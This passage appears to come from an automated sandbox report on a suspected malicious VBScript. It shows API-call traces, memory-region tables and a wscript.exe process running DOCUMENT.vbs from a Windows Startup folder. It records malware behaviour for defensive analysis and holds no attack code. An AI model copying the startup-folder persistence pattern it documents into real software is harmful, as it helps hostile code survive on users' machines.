lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0225.440] Sleep (dwMilliseconds=0xac) [0225.624] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0225.624] Sleep (dwMilliseconds=0xac) [0225.811] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0225.811] Sleep (dwMilliseconds=0xac) [0225.998] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0225.998] Sleep (dwMilliseconds=0xac) [0226.188] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0226.188] Sleep (dwMilliseconds=0xac) [0226.375] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0226.375] Sleep (dwMilliseconds=0xac) [0226.560] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0226.560] Sleep (dwMilliseconds=0xac) [0226.747] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0226.747] Sleep (dwMilliseconds=0xac) [0226.935] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0226.935] Sleep (dwMilliseconds=0xac) [0227.122] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0227.122] Sleep (dwMilliseconds=0xac) Process: id = "13" image_name = "wscript.exe" filename = "c:\\windows\\system32\\wscript.exe" page_root = "0x1ab6a000" os_pid = "0x568" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f758" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1991 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1992 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1993 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1994 start_va = 0x77320000 end_va = 0x774c8fff entry_point = 0x77320000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1995 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1996 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1997 start_va = 0xffe70000 end_va = 0xffe9bfff entry_point = 0xffe70000 region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\System32\\wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe") Region: id = 1998 start_va = 0x7feff640000 end_va = 0x7feff640fff entry_point = 0x7feff640000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1999 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2000 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2001 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2124 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2125 start_va = 0x77200000 end_va = 0x7731efff entry_point = 0x77200000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2126 start_va = 0x7fefd380000 end_va = 0x7fefd3eafff entry_point = 0x7fefd380000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2127 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2128 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2129 start_va = 0x77100000 end_va = 0x771f9fff entry_point = 0x77100000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2130 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2131 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2132 start_va = 0x7fefc430000 end_va = 0x7fefc43bfff entry_point = 0x7fefc430000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2133 start_va = 0x7fefd640000 end_va = 0x7fefd716fff entry_point = 0x7fefd640000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2134 start_va = 0x7fefd9d0000 end_va = 0x7fefd9ddfff entry_point = 0x7fefd9d0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2135 start_va = 0x7fefda80000 end_va = 0x7fefdb48fff entry_point = 0x7fefda80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2136 start_va = 0x7fefe9f0000 end_va = 0x7fefebf2fff entry_point = 0x7fefe9f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2137 start_va = 0x7feff060000 end_va = 0x7feff07efff entry_point = 0x7feff060000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2138 start_va = 0x7feff080000 end_va = 0x7feff15afff entry_point = 0x7feff080000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2139 start_va = 0x7feff160000 end_va = 0x7feff1fefff entry_point = 0x7feff160000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2140 start_va = 0x7feff200000 end_va = 0x7feff32cfff entry_point = 0x7feff200000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2141 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2142 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2143 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2144 start_va = 0x5c0000 end_va = 0x747fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2145 start_va = 0x7fefecd0000 end_va = 0x7fefedd8fff entry_point = 0x7fefecd0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2146 start_va = 0x7feff330000 end_va = 0x7feff35dfff entry_point = 0x7feff330000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2147 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2148 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2149 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2150 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2151 start_va = 0x750000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2152 start_va = 0x8e0000 end_va = 0x1cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2153 start_va = 0x1ce0000 end_va = 0x2022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Region: id = 2154 start_va = 0x2f0000 end_va = 0x36cfff entry_point = 0x2f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2155 start_va = 0x2f0000 end_va = 0x36cfff entry_point = 0x2f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2156 start_va = 0x7fefd160000 end_va = 0x7fefd16efff entry_point = 0x7fefd160000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2157 start_va = 0x7fefb350000 end_va = 0x7fefb3a5fff entry_point = 0x7fefb350000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2158 start_va = 0x2030000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2159 start_va = 0x2f0000 end_va = 0x3cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2160 start_va = 0x22e0000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 2161 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2162 start_va = 0x23e0000 end_va = 0x26aefff entry_point = 0x23e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2163 start_va = 0x1e0000 end_va = 0x1e5fff entry_point = 0x1e0000 region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\System32\\wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe") Region: id = 2164 start_va = 0x7fefd170000 end_va = 0x7fefd200fff entry_point = 0x7fefd170000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2165 start_va = 0x27a0000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 2166 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2167 start_va = 0x7fefaf70000 end_va = 0x7fefaf87fff entry_point = 0x7fefaf70000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2168 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2169 start_va = 0x7fefd9e0000 end_va = 0x7fefda78fff entry_point = 0x7fefd9e0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2170 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2171 start_va = 0x7fef77c0000 end_va = 0x7fef7859fff entry_point = 0x7fef77c0000 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll") Region: id = 2172 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x3f0000 region_type = mapped_file name = "document.vbs" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\document.vbs") Region: id = 2173 start_va = 0x7fefd320000 end_va = 0x7fefd359fff entry_point = 0x7fefd320000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2174 start_va = 0x7fefd490000 end_va = 0x7fefd5f6fff entry_point = 0x7fefd490000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2175 start_va = 0x7fefd310000 end_va = 0x7fefd31efff entry_point = 0x7fefd310000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2176 start_va = 0x7fefcb80000 end_va = 0x7fefcb96fff entry_point = 0x7fefcb80000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2177 start_va = 0x3f0000 end_va = 0x434fff entry_point = 0x3f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2178 start_va = 0x3f0000 end_va = 0x434fff entry_point = 0x3f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2179 start_va = 0x3f0000 end_va = 0x434fff entry_point = 0x3f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2180 start_va = 0x3f0000 end_va = 0x434fff entry_point = 0x3f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2181 start_va = 0x3f0000 end_va = 0x434fff entry_point = 0x3f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2182 start_va = 0x7fefc860000 end_va = 0x7fefc8a6fff entry_point = 0x7fefc860000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2183 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x3f0000 region_type = mapped_file name = "document.vbs" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\document.vbs") Region: id = 2184 start_va = 0x21c0000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 2185 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2186 start_va = 0x7fef7440000 end_va = 0x7fef744afff entry_point = 0x7fef7440000 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 2187 start_va = 0x28a0000 end_va = 0x389ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 2188 start_va = 0x400000 end_va = 0x400fff entry_point = 0x400000 region_type = mapped_file name = "document.vbs" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\document.vbs") Region: id = 2189 start_va = 0x38a0000 end_va = 0x399ffff entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 2190 start_va = 0x7fef7320000 end_va = 0x7fef733cfff entry_point = 0x7fef7320000 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 2191 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2192 start_va = 0x7fef6150000 end_va = 0x7fef61effff entry_point = 0x7fef6150000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2193 start_va = 0x7fefdb50000 end_va = 0x7fefdbe6fff entry_point = 0x7fefdb50000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 2194 start_va = 0x7feff5b0000 end_va = 0x7feff620fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2195 start_va = 0x7fefdc00000 end_va = 0x7fefe987fff entry_point = 0x7fefdc00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2196 start_va = 0x450000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2197 start_va = 0x2030000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2198 start_va = 0x2140000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 2199 start_va = 0x7fef5ec0000 end_va = 0x7fef5efbfff entry_point = 0x7fef5ec0000 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll") Region: id = 2200 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2201 start_va = 0x7fef5c80000 end_va = 0x7fef5ca7fff entry_point = 0x7fef5c80000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 2202 start_va = 0x7fefa7f0000 end_va = 0x7fefa807fff entry_point = 0x7fefa7f0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2203 start_va = 0x7fef5c40000 end_va = 0x7fef5c73fff entry_point = 0x7fef5c40000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 2204 start_va = 0x400000 end_va = 0x413fff entry_point = 0x400000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 2205 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2206 start_va = 0x3b60000 end_va = 0x3c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 2207 start_va = 0x7fefc030000 end_va = 0x7fefc15bfff entry_point = 0x7fefc030000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2208 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2209 start_va = 0x430000 end_va = 0x431fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2210 start_va = 0x7fefbb80000 end_va = 0x7fefbd73fff entry_point = 0x7fefbb80000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2211 start_va = 0x460000 end_va = 0x461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2212 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2213 start_va = 0x7fefbfd0000 end_va = 0x7fefbffcfff entry_point = 0x7fefbfd0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2214 start_va = 0x7fefe990000 end_va = 0x7fefe9e1fff entry_point = 0x7fefe990000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2215 start_va = 0x470000 end_va = 0x48ffff entry_point = 0x470000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 2216 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2217 start_va = 0x7fefd270000 end_va = 0x7fefd27efff entry_point = 0x7fefd270000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2218 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2219 start_va = 0x4b0000 end_va = 0x4b3fff entry_point = 0x4b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2220 start_va = 0x26b0000 end_va = 0x26dffff entry_point = 0x26b0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 2221 start_va = 0x26e0000 end_va = 0x2745fff entry_point = 0x26e0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2222 start_va = 0x3cd0000 end_va = 0x3dcffff entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 2223 start_va = 0x7fefd360000 end_va = 0x7fefd379fff entry_point = 0x7fefd360000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2224 start_va = 0x7fefd600000 end_va = 0x7fefd635fff entry_point = 0x7fefd600000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2225 start_va = 0x7feff360000 end_va = 0x7feff536fff entry_point = 0x7feff360000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2226 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2227 start_va = 0x3dd0000 end_va = 0x41c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 2228 start_va = 0x42a0000 end_va = 0x439ffff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 2229 start_va = 0x7fefa5c0000 end_va = 0x7fefa616fff entry_point = 0x7fefa5c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2230 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2231 start_va = 0x7fef8550000 end_va = 0x7fef8583fff entry_point = 0x7fef8550000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 2232 start_va = 0x7fefd720000 end_va = 0x7fefd849fff entry_point = 0x7fefd720000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2233 start_va = 0x7fefd850000 end_va = 0x7fefd9c7fff entry_point = 0x7fefd850000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2234 start_va = 0x7fefede0000 end_va = 0x7feff038fff entry_point = 0x7fefede0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2235 start_va = 0x7fefd130000 end_va = 0x7fefd154fff entry_point = 0x7fefd130000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2236 start_va = 0x2130000 end_va = 0x2130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Thread: id = 90 os_tid = 0x56c [0295.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efe40 | out: lpSystemTimeAsFileTime=0x2efe40*(dwLowDateTime=0x735b2f40, dwHighDateTime=0x1d474ea)) [0295.951] GetCurrentProcessId () returned 0x568 [0295.951] GetCurrentThreadId () returned 0x56c [0295.951] GetTickCount () returned 0x69ba [0295.951] QueryPerformanceCounter (in: lpPerformanceCount=0x2efe48 | out: lpPerformanceCount=0x2efe48*=1807068500000) returned 1 [0295.952] GetStartupInfoA (in: lpStartupInfo=0x2efe60 | out: lpStartupInfo=0x2efe60*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 